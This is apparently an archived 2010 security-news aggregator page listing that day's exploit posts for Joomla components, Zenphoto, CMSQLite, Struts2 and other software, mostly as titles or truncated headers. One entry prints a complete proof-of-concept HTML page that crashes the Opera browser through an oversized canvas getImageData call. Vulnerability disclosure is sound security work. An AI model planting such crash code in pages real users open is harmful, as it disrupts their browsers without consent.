Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Entries for July 14th, 2010

Joomla Health & Fitness Stats Persistent XSS Vulnerability


Opera Denial of Service by <canvas> Element

Opera.html
<html>
<body onload="Opera()">
<script language=JavaScript>
function Opera() {
canvas = document.getElementById("canvas");
ctx = canvas.getContext("2d");
ctx.getImageData(0,0,0x20000,0x20000);
}
</script>
<canvas id=canvas width=10 height=10></canvas>
</body>
</html>
# Inj3ct0r.com [2010-07-12]


Ad Network Script Persistent XSS Vulnerability


Joomla Component (shop.browse) Blind SQL Injection Vulnerability

# Exploit Title: joomla (shop.browse) Blind SQL Injection Vulnerability
# Date: 14/7/2010
# Author:ThE DarK
# E-MaiL : Mu0@Hotmail.com
# Software Link: Not available :p
# Version: shop.browse
# Platform / [...]


Joomla Component com_easygallery Persistent XSS Vulnerability


2daybiz Businesscard Script Authentication bypass

# Exploit Title: 2daybiz Businesscard Script Authentication bypass
# Date: 14th july 2010
# Author: D4rk357
#Critical:high
#contact:d4rk357[at]yahoo[dot]in
# Software Link:http://www.2daybiz.com/products/businesscard/index.php
Greetz to :b0nd, Fbih2s,rockey killer,The empty(), punter,eberly,prashant
Shoutz to : http://www.garage4hackers.com/forum.php , h4ck3r.in and [...]


Zenphoto CMS 1.3 Multiple CSRF Vulnerabilities

<!--
Title: Zenphoto CMS 1.3 Multiple CSRF Vulnerabilities
Author: 10n1z3d <10n1z3d[at]w[dot]cn>
Date: Wed 14 Jul 2010 12:48:56 PM [...]


CMSQLite SQL Injection Vulnerability

# Product: CMSQLite
# Vendor: CMSQLite-Team
# Vulnerable Version: 1.3 and Probably Prior Versions
# June 2010
# Vulnerability Type: SQL Injection
# Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
# Risk level: Low
# Credit: High-Tech [...]


Joomla Component com_jobs Upload Vulnerability


Joomla Component com_fireboard Persistent XSS Vulnerability


linux/x86 standard system beep polymorphic shellcode 87 bytes


Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability

The Apache Struts team has announced and uploaded, but has not released (due to an unreasonably prolonged voting process), the 2.2.0 release of the Struts2 web framework [...]


Three easy steps to remote iPhone snooping

Mobile devices can present a serious threat to your network security because it can be surprisingly easy to hijack their data connections. With the ability to browse through a user’s mobile data traffic, a hacker may easily find confidential information, such as usernames and passwords, that they can then use to attack your corporate network [...]
